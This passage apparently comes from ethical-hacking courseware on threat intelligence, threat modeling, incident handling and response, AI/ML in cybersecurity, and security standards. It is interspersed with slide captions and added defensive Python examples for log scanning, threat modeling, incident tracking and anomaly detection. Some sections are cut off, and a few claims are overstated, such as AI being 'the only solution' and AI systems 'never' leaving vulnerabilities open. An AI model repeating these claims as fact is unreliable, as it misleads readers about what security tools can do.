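        m = LOG_RE.match(line)
        if not m:
            continue        # malformed line: skip it rather than abort the scan
        if m["src"] in checklist["ip"]:
            hits.append((m["ts"], "ip", m["src"]))
        if m["host"] in checklist["domain"]:
            hits.append((m["ts"], "domain", m["host"]))
    return hits


# Constructed sample log lines
SAMPLE_LOG = [
    "2024-01-05T10:00:00Z 192.0.2.10 intranet.example /",
    "2024-01-05T10:00:01Z 203.0.113.45 intranet.example /search?q=a",
    "2024-01-05T10:00:02Z 192.0.2.11 login-examp1e.test /verify",
    "garbage line",
    "2024-01-05T10:00:03Z 198.51.100.7 intranet.example /admin",
]

if __name__ == "__main__":
    for ts, kind, value in scan_logs(SAMPLE_LOG, build_checklist(FEED)):
        print(f"{ts} matched {kind} indicator {value}")
```

The low-confidence hash never reaches the checklist, the malformed line is skipped, and the three matching lines are reported with the indicator type that fired, which is the information an analyst needs to decide how the hit should be handled.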
Types of Threat Intelligence

Threat intelligence is contextual information that describes threats and guides organizations in making various business decisions. It is extracted from a huge collection of sources and information. It provides operational insight by looking outside the organization and issuing alerts on evolving threats to the organization. For the better management of information collected from different sources, it is important to subdivide threat intelligence into different types. This subdivision is performed

▪ Strategic Threat Intelligence
Strategic threat intelligence provides information regarding high-level cybersecurity posture, threats, details about the financial impact of various cyber activities, attack trends, and the impact of high-level business decisions. This information is consumed by the high-level executives and management of the organization, such as IT management and the CISO. It helps the management to identify current cyber risks, unknown future risks, threat groups, and attribution of breaches. The intelligence obtained provides a risk-based view that mainly focuses on high-level concepts of risks and their probability. It mainly deals with long-term issues and provides real-time alerts for threats to the organization's critical assets, such as IT infrastructure, employees, customers, and applications. This intelligence is used by the management to make strategic business decisions and to analyze their effect. Based on the analysis, the management can allocate sufficient budget and staff to protect critical IT assets and business processes.
Strategic threat intelligence is generally in the form of a report that mainly focuses on high-level business strategies. Since the characteristic of strategic threat intelligence is preeminent, the data collection also relates to high-level sources and requires highly skilled professionals to extract information. This intelligence is collected from sources such as OSINT, CTI vendors, and ISAOs and ISACs.
The strategic threat intelligence helps organizations identify any similar past incidents, their intentions, and any attributes that might identify the attacking adversaries, why the organization is within the scope of the attack, major attack trends, and how to reduce the risk level.
Generally, strategic threat intelligence includes the following information:
o The financial impact of cyber activity
o Attribution for intrusions and data breaches
o Threat actors and attack trends
o The threat landscape for various industry sectors
o Statistical information on data breaches, data theft, and malware
o Geopolitical conflicts involving various cyberattacks
o Information on how adversary TTPs change over time
o Industry sectors that might impact due to high-level business decisions
identify and stop upcoming attacks, improve early-stage attack detection capability, and reduce an attack's damage to IT assets.
Operational threat intelligence is generally collected from sources such as humans, social media, and chat rooms; it may also be collected from the real-world activities and events that result in cyberattacks. Operational threat intelligence is obtained by analyzing human behavior, threat groups, and by similar means. This information helps to predict future attacks and thus enhances incident response plans and mitigation strategies. Operational threat intelligence generally appears as a report that contains identified malicious activities, recommended courses of action, and warnings of emerging attacks.

▪ Technical Threat Intelligence
Technical threat intelligence provides information about resources an attacker uses to perform an attack; this includes command and control channels, tools, and other items. It has a shorter lifespan compared to tactical threat intelligence and mainly focuses on a
[Slide: Threat Modeling. Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing, and analyzing all the information that affects the security of an application. Threat Modeling Process: 01 Identify Security Objectives (helps to determine how much effort needs to be put toward subsequent steps); 02 Application Overview; 03 Decompose the Application; 04 Identify Threats (threats relevant to the control scenario, using the information obtained in the application overview and decompose steps); 05 Identify Vulnerabilities (weaknesses related to the threats found using vulnerability categories).]
Threat Modeling

Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing, and analyzing all the information that affects it. The threat model consists of three major building blocks: understanding the adversary's perspective, characterizing the security of the system, and determining threats. Every application should have a developed and documented threat model that should be revisited as the application evolves and development progresses.

When using this approach, an administrator should keep the following in mind:
▪ Try not to be rigid about specific steps or implementations; instead, focus on the approach. If any step becomes impassable, go right to step 4 of the threat modeling process and identify the problem.
▪ Use scenarios to scope the modeling activity.
▪ Use existing design documents. Use items like documented use cases or use stories, architectural diagrams, data flow diagrams, or other design documentation.
▪ Start with a whiteboard before capturing information in documents or getting lost in details. It may be helpful to use a digital camera with printing capabilities to document and distribute the information from the whiteboard.
▪ Use an iterative approach. Add more details and improve the threat model as design and development continue. This will help with becoming familiar with the modeling process and developing the threat model to better examine more possible scenarios.
▪ Obtain input about the host and network constraints from the system and network administrators. To better understand the end-to-end deployment diagram, obtain as much information as possible about host configurations, firewall policies, allowed protocols and ports, and other relevant details.

The threat modeling process involves five steps:

1. Identify Security Objectives
Security objectives are the goals and constraints related to the application's confidentiality, integrity, and availability. Security-specific objectives guide the threat modeling efforts and help to determine how much effort needs to be put toward subsequent steps. To identify security objectives, administrators should ask the following questions:
o What data should be protected?
o Are there any compliance requirements?
o Are there specific quality-of-service requirements?
o Are there intangible assets to protect?

2. Application Overview
Identify the components, data flows, and trust boundaries. To draw the end-to-end deployment scenario, the administrator should use a whiteboard. First, they should draw a rough diagram that explains the workings and structure of the application, its subsystems, and its deployment characteristics. The deployment diagram should contain the following:
o End-to-end deployment topology
o Logical layers
o Key components
o Key services
o Communication ports and protocols
o Identities
o External dependencies

▪ Identify Roles
The administrator should identify people and the roles and actions they can perform within the application. For example, are there higher-privileged groups of users? Who can read data? Who can update data? Who can delete data?
▪ Identify Key Usage Scenarios
The administrator should use the application's use cases to determine its objective. Use cases explain how the application is used and misused.

▪ Identify Technologies
The administrator should list the technologies and key features of the software, as well as the following technologies in use:
o Operating systems
o Web server software
o Database server software
o Technologies for presentation, business, and data access layers
o Development languages
Identifying these technologies helps to focus on technology-specific threats.

▪ Identify Application Security Mechanisms
The administrator should identify some key points regarding the following:
o Input and data validation
o Authorization and authentication
o Sensitive data
o Configuration management
o Session management
o Parameter manipulation
o Cryptography
o Exception management
o Auditing and logging
These efforts aim to identify relevant details and to add details where required, or to identify areas that require more.

3. Decompose the Application
In this step, the administrator breaks down the application to identify the trust boundaries, data flows, entry points, and exit points. Doing so makes it considerably easier to find more relevant and more detailed threats and vulnerabilities.

▪ Identify Trust Boundaries
Identifying the application's trust boundaries helps the administrator to focus on the relevant areas of the application. It indicates where trust levels change.
o Identify outer system boundaries
o Identify access control points or key places where access requires extra privileges or role membership
o Identify trust boundaries from a data flow perspective

▪ Identify Data Flows

▪ Identify Entry Points
The application's entry point can also serve as an entry point for attacks. All users interact with the application at these entry points. Other internal entry points uncovered by subcomponents over the layers of the application may be present only to support internal communication with other components. The administrator should identify these entry points to determine the methods used by an intruder to get in through them. They should focus on the entry points that allow access to critical functionalities and provide adequate defense for them.

▪ Identify Exit Points
The administrator should also identify the points where the application transfers data to the client or external systems. They should prioritize the exit points at which the application writes data containing client input or data from untrusted sources, such as a shared database.

4. Identify Threats
The administrator should identify threats relevant to the control scenario and context using the information obtained in the application overview and decompose application steps. They should bring members of the development and test teams together to identify potential threats. The team should start with a list of common threats grouped by their application vulnerability category. This step uses a question-driven approach to help identify threats.
5. Identify Vulnerabilities
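Steps 2 through 4 (overview, decomposition into trust boundaries, entry and exit points, then question-driven threat identification) can be captured in a small model that a team can grow as the design evolves. The following is an added example, not code from the courseware: the components, trust zones, data flows and the four questions are constructed for illustration, and the numeric ordering of trust zones is an assumption.

```python
"""Decomposing an application and identifying threats from its trust boundaries.

Added example, not from the CEH courseware. The components, trust zones,
data flows and the question list are constructed; the numeric trust
ordering is an assumption.
"""
from dataclasses import dataclass

# Assumed trust ordering: a higher number means a more trusted zone.
TRUST = {"internet": 0, "dmz": 1, "internal": 2, "data": 3}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    data: str
    untrusted_input: bool = False   # carries client input or shared-database data


# Constructed application overview: component -> trust zone
COMPONENTS = {
    "browser": "internet",
    "partner-api": "internet",
    "web-tier": "dmz",
    "shared-reporting-db": "dmz",   # shared with other applications
    "api": "internal",
    "db": "data",
}

# Constructed data flows between components
FLOWS = [
    Flow("browser", "web-tier", "login form", untrusted_input=True),
    Flow("web-tier", "api", "session token"),
    Flow("api", "db", "SQL query", untrusted_input=True),
    Flow("db", "api", "rows"),
    Flow("api", "partner-api", "report JSON", untrusted_input=True),
    Flow("db", "shared-reporting-db", "replicated rows", untrusted_input=True),
]


def trust_boundaries(flows, components):
    """A flow whose endpoints sit in different trust zones crosses a boundary."""
    return [f for f in flows if components[f.src] != components[f.dst]]


def entry_points(flows, components):
    """Components that receive a flow from a less-trusted zone."""
    return sorted({f.dst for f in flows
                   if TRUST[components[f.src]] < TRUST[components[f.dst]]})


def exit_points(flows, components):
    """Components that send data to a less-trusted zone (clients, external systems)."""
    return sorted({f.src for f in flows
                   if TRUST[components[f.src]] > TRUST[components[f.dst]]})


# Question-driven threat identification: each question is asked of every
# boundary-crossing flow; a True answer puts that flow on the team's list.
QUESTIONS = [
    ("input validation",
     lambda f, c: f.untrusted_input and TRUST[c[f.src]] < TRUST[c[f.dst]]),
    ("authentication/authorization",
     lambda f, c: True),                       # asked of every boundary crossing
    ("sensitive data exposure",
     lambda f, c: TRUST[c[f.src]] > TRUST[c[f.dst]]),
    ("untrusted data written out",           # the exit points to prioritize
     lambda f, c: f.untrusted_input and TRUST[c[f.src]] > TRUST[c[f.dst]]),
]


def identify_threats(flows, components):
    """Return (vulnerability category, flow description) pairs to examine."""
    threats = []
    for f in trust_boundaries(flows, components):
        for category, applies in QUESTIONS:
            if applies(f, components):
                threats.append((category, f"{f.src}->{f.dst}: {f.data}"))
    return threats


if __name__ == "__main__":
    print("entry points:", entry_points(FLOWS, COMPONENTS))
    print("exit points: ", exit_points(FLOWS, COMPONENTS))
    for category, flow in identify_threats(FLOWS, COMPONENTS):
        print(f"{category:30} {flow}")
```

The output lists web-tier, api and db as entry points and api and db as exit points, and the "untrusted data written out" category lands on exactly the two exit flows that carry client input or shared-database data outward, which is the prioritization the exit-point step above asks for.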
[Slide: Incident Management. Incident management is a set of defined processes to identify, analyze, prioritize, and resolve security incidents. Diagram: Incident Management comprises Vulnerability Handling, Incident Handling, and Artifact Handling.]
Incident Management

Incident management is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore the system to normal service operations as soon as possible, and prevent recurrence of the incident. It involves not only responding to incidents but also triggering alerts to prevent potential risks and threats. A security administrator must identify software that is open to attacks before someone takes advantage of the vulnerabilities.

Incident management includes the following:
▪ Vulnerability analysis
▪ Artifact analysis
▪ Security awareness training
▪ Intrusion detection
▪ Public or technology monitoring

The incident management process is designed to:
▪ Improve service quality
▪ Resolve problems proactively
▪ Reduce the impact of incidents on an organization or its business
▪ Meet service availability requirements
▪ Increase staff efficiency and productivity
▪ Improve user and customer satisfaction
▪ Assist in handling future incidents
Conducting training sessions to spread awareness among users is an important part of incident management. Such sessions help end-users to recognize suspicious events or incidents easily and report an attacker's behavior to the appropriate authority.

The following people perform incident management activities:
▪ Human resources personnel take steps to fire employees suspected of harmful computer activities.
▪ The legal counsel sets the rules and regulations in an organization. These rules can influence the internal security policies and practices of the organization in case an insider or an organization's attacker uses the system for harmful or malicious activities.
▪ The firewall manager keeps filters in place. These filters are frequently where denial-of-service attacks are made.
▪ An outsourced service provider repairs systems infected by viruses and malware.

Incident response is one of the functions performed in incident handling. In turn, incident handling is one of the services provided as part of incident management. The following diagram illustrates the relationship between incident response, incident handling, and incident management.

[Figure: Incident Management contains Vulnerability Handling, Incident Handling (with Announcements and Analysis), and Artifact Handling.]
Figure 1.4: Block Diagram of Incident Management
[Slide: Incident Handling and Response. Steps involved in the IH&R process: Preparation; Incident Recording and Assignment; Incident Triage; Notification; Containment; Evidence Gathering and Forensic Analysis; Eradication; Recovery; Post-Incident Activities.]
Incident Handling and Response

Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyberattack. It is a set of procedures, actions, and measures taken against an unexpected event occurrence. It involves logging, recording, and resolving incidents that take place in the organization. It notes the incident, when it occurred, its impact, and its cause. It is the practice of managing the incident response processes, such as preparation, detection, containment, eradication, and recovery, to overcome the impact of an incident quickly and efficiently. IH&R processes are important to provide a focused approach for restoring normal business operations as quickly as possible after an incident and with a minimal impact on the business.

The IH&R process involves defining user policies, developing protocols, building incident response teams, auditing organizational assets, planning incident response procedures, obtaining management approval, incident reporting, prioritization, and managing response. It also includes establishing proper communication between the individuals responding to an incident and guiding them to detect, analyze, contain, recover, and prevent incidents.

Discussed below are the steps involved in the IH&R process:

▪ Step 1: Preparation
The preparation phase includes performing an audit of resources and assets to determine the purpose of security and define the rules, policies, and procedures that drive the IH&R process. It also includes building and training an incident response team, defining incident readiness procedures, and gathering required tools as well as training the employees to secure their systems and accounts.
▪ Step 2: Incident Recording and Assignment
In this phase, the initial reporting and recording of the incident take place. This phase handles identifying an incident and defining proper incident communication plans for the employees and also includes communication methods that involve informing IT support personnel or submitting an appropriate ticket.

▪ Step 3: Incident Triage
In this phase, the identified security incidents are analyzed, validated, categorized, and prioritized. The IH&R team further analyzes the compromised device to find incident details such as the type of attack, its severity, target, impact, and method of propagation, and any vulnerabilities it exploited.

▪ Step 4: Notification
In the notification phase, the IH&R team informs various stakeholders, including management, third-party vendors, and clients, about the identified incident.

▪ Step 5: Containment
This phase helps to prevent the spread of infection to other organizational assets, preventing additional damage.

▪ Step 6: Evidence Gathering and Forensic Analysis
In this phase, the IH&R team accumulates all possible evidence related to the incident and submits it to the forensic department for investigation. Forensic analysis of an incident reveals details such as the method of attack, vulnerabilities exploited, security mechanisms averted, network devices infected, and applications compromised.

▪ Step 7: Eradication
In the eradication phase, the IH&R team removes or eliminates the root cause of the incident and closes all the attack vectors to prevent similar incidents in the future.

▪ Step 8: Recovery
After eliminating the causes for the incidents, the IH&R team restores the affected systems, services, resources, and data through recovery. It is the responsibility of the incident response team to ensure that the incident causes no disruption to the services or business of the organization.

▪ Step 9: Post-Incident Activities
Once the process is complete, the security incident requires additional review and analysis before closing the matter. Conducting a final review is an important step in the IH&R process that includes:
o Incident documentation
o Incident impact assessment
o Reviewing and revising policies
o Closing the investigation
o Incident disclosure
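A tracker that walks a ticket through the nine steps above, refusing to skip ahead and recording who did what at each step, is one way to make the sequence enforceable rather than a checklist on paper. This is an added example, not courseware code: the incident fields, the severity scale, the priority rule (severity times asset criticality), the notification policy and the sample ticket are all constructed assumptions.

```python
"""IH&R workflow tracker: enforces the step order and records each step.

Added example, not from the CEH courseware. The incident fields, severity
scale, priority and notification rules and the sample ticket are constructed;
the rule that a step may only run after its predecessor is an assumption.
"""
from datetime import datetime, timezone

# The nine IH&R steps, in order
STEPS = [
    "preparation", "recording_and_assignment", "triage", "notification",
    "containment", "evidence_gathering", "eradication", "recovery", "post_incident",
]

SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}   # assumed scale


class Incident:
    def __init__(self, ticket_id, summary):
        self.ticket_id = ticket_id
        self.summary = summary
        self.history = []          # (step, actor, timestamp, note)
        self.priority = None
        self.stakeholders = []

    @property
    def current_step(self):
        return self.history[-1][0] if self.history else None

    def advance(self, step, actor, note=""):
        """Record a step; refuse to skip ahead or go back in the sequence."""
        expected = STEPS[len(self.history)] if len(self.history) < len(STEPS) else None
        if step != expected:
            raise ValueError(f"{self.ticket_id}: expected step '{expected}', got '{step}'")
        self.history.append((step, actor, datetime.now(timezone.utc).isoformat(), note))
        return self


def triage(incident, attack_type, severity, asset_criticality):
    """Step 3: categorize and prioritize. Priority = severity x asset criticality (assumed)."""
    incident.priority = SEVERITY[severity] * asset_criticality
    note = f"type={attack_type} severity={severity} asset={asset_criticality}"
    return incident.advance("triage", "ih&r-team", note)


def notify(incident):
    """Step 4: who is informed depends on the priority (assumed policy)."""
    incident.stakeholders = ["management"]
    if incident.priority >= 8:
        incident.stakeholders += ["third-party vendors", "clients"]
    return incident.advance("notification", "ih&r-team", ", ".join(incident.stakeholders))


def run_sample():
    """Walk a constructed ticket through all nine steps."""
    inc = Incident("INC-0001", "Ransomware note on file server (constructed)")
    inc.advance("preparation", "security-admin", "playbook and tools verified")
    inc.advance("recording_and_assignment", "helpdesk", "ticket opened from user report")
    triage(inc, "ransomware", "critical", 3)
    notify(inc)
    for step in ("containment", "evidence_gathering", "eradication", "recovery", "post_incident"):
        inc.advance(step, "ih&r-team")
    return inc


def skipping_is_rejected():
    """Containment cannot be recorded before recording, triage and notification."""
    inc = Incident("INC-0002", "Phishing report (constructed)")
    inc.advance("preparation", "security-admin")
    try:
        inc.advance("containment", "ih&r-team")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for step, actor, ts, note in run_sample().history:
        print(f"{ts} {step:26} {actor:15} {note}")
```

The history of the sample ticket is the incident documentation the post-incident review asks for: every step carries its actor, timestamp and note, and the triage note preserves the attack type and severity used to decide who was notified.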
[Slide: Role of AI and ML in Cyber Security. Machine Learning: Supervised Learning, Unsupervised Learning. The AI-related cyber security market is predicted to reach a value of $38.2 billion by 2026.]
[Slide: Role of AI and ML in Cyber Security (Cont'd). According to CB Insights, alongside overall rising investment activity, cybersecurity is the fourth most active industry that deals with companies applying AI to offer novel solutions to emerging cyber threats. Image: market map “Cybersecurity's Next Step: Companies Securing the Future with Artificial Intelligence”.]
Role of AI and ML in Cyber Security

Machine learning (ML) and Artificial Intelligence (AI) are now popularly used across various industries and applications due to the increase in computing power, data collection, and storage capabilities. Along with technological advancements in AI, such as self-driving cars, language translators, and big data, there is also a rise in threats such as ransomware, botnets, malware, and phishing.

Using AI and ML in cybersecurity helps to identify new exploits and weaknesses, which can be easily analyzed to mitigate further attacks. It reduces the pressure on security professionals and alerts them whenever an action is needed.

What are AI and ML?

Artificial intelligence is the only solution to defend networks against the various attacks that an antivirus scan cannot detect. A huge amount of collected data is fed into the AI, which processes and analyzes it to understand its details and trends.

ML is a branch of artificial intelligence (AI) that gives the systems the ability to self-learn without any explicit programs. This self-learning system is used to define what the normal network, along with its devices, looks like, and then uses this to backtrack and report any deviations or anomalies in real-time.

There are two types of ML classification techniques:

▪ Supervised Learning
Supervised learning uses algorithms that input a set of labeled training data to attempt to learn the differences between the given labels. Supervised learning is further divided into two subcategories, namely, classification and regression. Classification includes
completely divided classes. Its main task is to define the test sample to identify its class. Regression is used when data classes are not separated, such as when the data is continuous.

▪ Unsupervised Learning
Unsupervised learning makes use of algorithms that input unlabeled training data to attempt to deduce all the categories without guidance. Unsupervised learning is further divided into two subcategories, namely, clustering and dimensionality reduction. Clustering divides the data into clusters based on their similarities, regardless of class information. Dimensionality reduction is the process of reducing the dimensions (attributes) of data.

Why AI and ML?

Source: https://www.gartner.com, https://www.marketsandmarkets.com

The security threat landscape continues to evolve not just in scale but, more importantly, in sophistication. Despite a range of advancements in the industry to safeguard against increasingly bold and intricate threats, organizations have struggled to keep pace with the technologies and techniques employed by attackers. As companies continue to increase their digital footprints, “identify and diagnose” capabilities are not enough to remediate against this growing fundamental business challenge for organizations of all shapes and sizes. The development of advanced security analytics is an important consideration for organizations looking to implement machine learning to defend against an array of internal and external security threats.

The cyber security market is set to exceed $300 billion by 2024, and the AI-related cyber security market is predicted to reach a value of $38.2 billion by 2026.

[Figure: AI in Cyber Security Market, by Region (USD Billion).]
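The distinction drawn in the “What are AI and ML?” passage above, supervised classification learning from labeled data versus unsupervised clustering finding groups in unlabeled data, is shown below on constructed connection records. This is an added example, not courseware code: the records, the two classes, the nearest-centroid classifier and the plain k-means routine (seeded with the first k points) are all constructed for illustration and stand in for the far richer features and libraries a real deployment would use.

```python
"""Supervised vs unsupervised learning on constructed connection records.

Added example, not from the CEH courseware. The records, labels, the
nearest-centroid classifier and the k-means routine are constructed for
illustration.
"""
import math

# Each record: (packets per second, average payload bytes). Constructed data.
LABELED = [   # supervised training set: feature vector + known class
    ((5, 800), "benign"), ((7, 750), "benign"), ((6, 900), "benign"), ((4, 820), "benign"),
    ((900, 40), "flood"), ((1100, 35), "flood"), ((950, 60), "flood"), ((1000, 45), "flood"),
]
UNLABELED = [(5, 810), (6, 790), (980, 50), (1050, 42), (7, 880), (920, 38)]


def dist(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def centroid(points):
    n = len(points)
    return tuple(sum(p[i] for p in points) / n for i in range(len(points[0])))


# --- Supervised: classification learns from the labels ----------------------
def train_centroids(labeled):
    """One centroid per known class."""
    by_class = {}
    for x, y in labeled:
        by_class.setdefault(y, []).append(x)
    return {y: centroid(xs) for y, xs in by_class.items()}


def classify(model, x):
    """Assign the class whose centroid is nearest to the sample."""
    return min(model, key=lambda y: dist(x, model[y]))


# --- Unsupervised: clustering finds the groups without labels ---------------
def kmeans(points, k, rounds=10):
    """Plain k-means; the first k points seed the centers (assumed seeding)."""
    centers = [points[i] for i in range(k)]
    groups = []
    for _ in range(rounds):
        groups = [[] for _ in range(k)]
        for p in points:
            groups[min(range(k), key=lambda i: dist(p, centers[i]))].append(p)
        centers = [centroid(g) if g else centers[i] for i, g in enumerate(groups)]
    return centers, groups


def cluster_sizes(points, k=2):
    """Sizes of the clusters k-means finds, smallest first."""
    _, groups = kmeans(points, k)
    return sorted(len(g) for g in groups)


if __name__ == "__main__":
    model = train_centroids(LABELED)
    for x in UNLABELED:
        print(x, "->", classify(model, x))
    centers, groups = kmeans(UNLABELED, 2)
    for c, g in zip(centers, groups):
        print("cluster around", tuple(round(v) for v in c), "holds", g)
```

The classifier needs the labels to name a sample "flood"; k-means, given the same samples without labels, still separates them into two groups of three, but it is left to the analyst to decide what each group means, which is the practical difference between the two families.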
AI and ML Application Areas

Source: https://www.cbinsights.com

According to CB Insights, alongside overall rising investment activity, many cybersecurity companies are emerging to offer novel solutions to cyber threats by leveraging the advantages of artificial intelligence (AI). According to CB Insights' AI Deals Tracker, cybersecurity is the fourth most active industry for deals to companies applying AI. As per CB Insights' data, there are over 80 private companies that are using AI, categorized into the nine main areas in which they operate:
▪ Anti-fraud and identity management
▪ Mobile security
▪ Predictive intelligence
▪ Behavioral analytics and anomaly detection
▪ Automated security
▪ Cyber-risk management
▪ App security
▪ IoT security
▪ Deception security

[Figure: CB Insights market map “Cybersecurity's Next Step: 80+ Companies Securing the Future with Artificial Intelligence”, grouping the companies into the nine areas listed above.]
[Slide: How Do AI and ML Prevent Cyber Attacks? Password protection and authentication; Phishing detection and prevention; Threat detection; Vulnerability management; Behavioral analytics; Network security; AI-based antivirus; Fraud detection; Botnet detection; AI to combat AI threats.]
▪ Threat Detection
Machine learning assists companies in detecting cyber-attacks before systems are compromised. Being a part of AI, machine learning constantly keeps admins notified of imminent cyber threats by carrying out logical data analysis. ML allows systems to run its algorithms upon the data being received, then performs deep learning on the data and comprehends the advancements required to ensure the safety of the information systems.

▪ Vulnerability Management
AI and ML-based systems never allow vulnerability to exist for long; they dynamically scan for all types of vulnerabilities and alert the admins before the system is exploited. They can also provide the attacker's information and the patterns used to perform the attack. These AI- and ML-based systems can also forecast how and when a vulnerability exploitation might occur.

▪ Behavioral Analytics
Another notable security improvement by artificial intelligence is “Behavioral Analytics.” Attackers who have stolen the credentials of a legitimate user can perform malicious activities on the organization's network; such attempts are difficult to detect and thwart. Here, AI with ML generates specific user patterns based on their regular usage. AI software instantly alerts the admin if it detects any suspicious activity or deviation in regular usage.
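The behavioral analytics idea just described, learn each user's regular pattern and alert on deviation from it, reduces to a per-user baseline and a distance measure. The following is an added example, not courseware code or any product's algorithm: the login records are constructed, the three features, the z-score rule and the threshold of 3 are assumptions chosen for illustration.

```python
"""Per-user behavioral baseline, then alerting on deviations from it.

Added example, not from the CEH courseware. The records are constructed;
the feature set, z-score rule and threshold are assumptions chosen for
illustration, not a product's algorithm.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed "regular usage": (user, hour of day, MB downloaded, distinct hosts touched)
BASELINE = [
    ("alice", 9, 12, 3), ("alice", 10, 15, 2), ("alice", 9, 11, 3), ("alice", 11, 14, 4),
    ("alice", 10, 13, 3), ("alice", 9, 12, 2), ("alice", 11, 16, 3), ("alice", 10, 14, 3),
    ("bob", 14, 200, 10), ("bob", 15, 220, 12), ("bob", 13, 180, 9), ("bob", 14, 210, 11),
    ("bob", 15, 190, 10), ("bob", 14, 205, 11), ("bob", 13, 195, 10), ("bob", 16, 215, 12),
]

FEATURES = ("hour", "megabytes", "hosts")


def build_profiles(records):
    """Learn each user's pattern: mean and standard deviation of every feature."""
    by_user = defaultdict(list)
    for user, *feats in records:
        by_user[user].append(feats)
    profiles = {}
    for user, rows in by_user.items():
        cols = list(zip(*rows))
        profiles[user] = {
            # floor the std-dev so a feature that never varied still scores sensibly
            name: (mean(col), pstdev(col) or 1.0)
            for name, col in zip(FEATURES, cols)
        }
    return profiles


def score_event(profiles, user, hour, megabytes, hosts):
    """Largest absolute z-score across the features, or None for an unknown user."""
    profile = profiles.get(user)
    if profile is None:
        return None
    values = {"hour": hour, "megabytes": megabytes, "hosts": hosts}
    return max(abs(values[f] - m) / s for f, (m, s) in profile.items())


def detect(profiles, events, threshold=3.0):
    """Alert on events that deviate from the user's regular usage.

    An account with no baseline at all is also reported: the system cannot
    say what "regular" means for it, which is itself worth a look.
    """
    alerts = []
    for user, hour, mb, hosts in events:
        z = score_event(profiles, user, hour, mb, hosts)
        if z is None:
            alerts.append((user, "no baseline"))
        elif z > threshold:
            alerts.append((user, f"deviation z={z:.1f}"))
    return alerts


# Constructed new events: one normal, one resembling use of a stolen credential, one unknown user
EVENTS = [
    ("alice", 10, 13, 3),      # ordinary mid-morning session
    ("alice", 3, 900, 40),     # 03:00, bulk download, many hosts touched
    ("mallory", 12, 10, 1),    # account never seen in the baseline
]

if __name__ == "__main__":
    for user, reason in detect(build_profiles(BASELINE), EVENTS):
        print(f"ALERT {user}: {reason}")
```

Only the second and third events raise alerts; alice's ordinary session scores well under the threshold because it sits inside the spread of her own history, while the off-hours bulk download is hundreds of standard deviations away on the volume feature alone.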
▪ Network Security
Two significant factors of network security are generating comprehensive security policies and mapping an enterprise's network topology. Unfortunately, both of these factors are time-consuming. Therefore, administrators are adopting AI to enhance this operation; it can carry out the network traffic analysis and propose efficient security policies by default.

▪ AI-based Antivirus
Traditional antivirus tools perform file scanning on the organization's networks to check if any signatures match those of known viruses or malware. The issue with this is that antivirus tools must be updated when the user wants to scan for new malware or viruses. Updating is time-consuming, and new deployment often takes a certain amount of time. To overcome these issues, organizations employ AI-based antiviruses, which use anomaly detection to understand programs' behavior. AI-based antivirus detects suspicious program behavior instead of matching signatures for viruses.

▪ Fraud Detection
AI and ML algorithms carry out anomaly detection to identify payment inconsistencies and fraudulent transactions. They also perform automated pattern discovery across different transactions. ML can easily differentiate between authentic and illegitimate transactions and blocks fraudulent transactions.
▪ Botnet Detection
Botnets can bypass the Intrusion Detection System (IDS) by leveraging its ineffectiveness in matching signatures. Botnets can be embedded using a highly sophisticated code that makes them untraceable by traditional IDS implementations. Hence, security professionals use AI and ML algorithms that alert about the suspicious behavior of a network and detect unauthorized intrusions.

▪ AI to Combat AI Threats
Attackers can also leverage AI technology to make their way into an organization's network; such cyber threats must be detected immediately. AI software can detect such imminent AI-augmented attacks before the network is compromised.
[Slide: Module Flow. Hacking Concepts; Ethical Hacking Concepts; Information Security Controls; Information Security Laws and Standards.]
Information Security Laws and Standards

Laws are a system of rules and guidelines that are enforced by a particular country or community to govern behavior. A Standard is a “document established by consensus and approved by a recognized body that provides, for common and repeated use, rules, guidelines, or characteristics for activities or their results, aimed at the achievement of the optimum degree of order in a given context.” This section deals with the various laws and standards dealing with information security in different countries.
[Slide: Payment Card Industry Data Security Standard (PCI DSS). The PCI DSS is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards. High Level Overview.]
Payment Card Industry Data Security Standard (PCI DSS)

Source: https://www.pcisecuritystandards.org

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards. This standard offers robust and comprehensive standards and supporting materials to enhance payment card data security. These materials include a framework of specifications, tools, measurements, and support resources to help organizations ensure the safe handling of cardholder information. PCI DSS applies to all entities involved in payment card processing, including merchants, processors, acquirers, issuers, and service providers, as well as all other entities that store, process or transmit cardholder data.

PCI DSS comprises a minimum set of requirements for protecting cardholder data. The Payment Card Industry (PCI) Security Standards Council has developed and maintains a high-level overview of PCI DSS requirements.
Table 1.3: Table showing the PCI Data Security Standard—High Level Overview

Failure to meet PCI DSS requirements may result in fines or the termination of payment-card processing privileges.
ISO/IEC 27001:2013
Source: https://www.iso.org

ISO/IEC 27001:2013 specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of an organization. It includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization. The regulation is intended to be suitable for several different uses, including:

- Use within organizations to formulate security requirements and objectives
- Use within organizations as a way to ensure that security risks are cost-effectively managed
- Use within organizations to ensure compliance with laws and regulations
- Defining new information security management processes
- Identifying and clarifying existing information security management processes
- Use by the management of organizations to determine the status of information security management activities
- Implementing business-enabling information security
- Use by organizations to provide relevant information about information security to customers
Health Insurance Portability and Accountability Act (HIPAA)

The Office of Civil Rights implemented HIPAA's Administrative Simplification Statute and Rules, as discussed below:
Electronic Transactions and Code Set Standards

Transactions are electronic exchanges involving the transfer of information between two parties for specific purposes. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) designated certain types of organizations as covered entities, including health plans, healthcare clearinghouses, and certain healthcare providers. In the HIPAA regulations, the Secretary of Health and Human Services (HHS) adopted certain standard transactions for the Electronic Data Interchange (EDI) of health care data. These transactions are claims and encounter information, payment and remittance advice, claim status, eligibility, enrollment and disenrollment, referrals and authorizations, coordination of benefits, and premium payment. Under HIPAA, if a covered entity electronically conducts one of the adopted transactions, they must use the adopted standard—either from ASC X12N or NCPDP (for certain pharmacy transactions). Covered entities must adhere to the content and format requirements of each transaction. Every provider who does business electronically must use the same healthcare transactions, code sets, and identifiers.
Privacy Rule

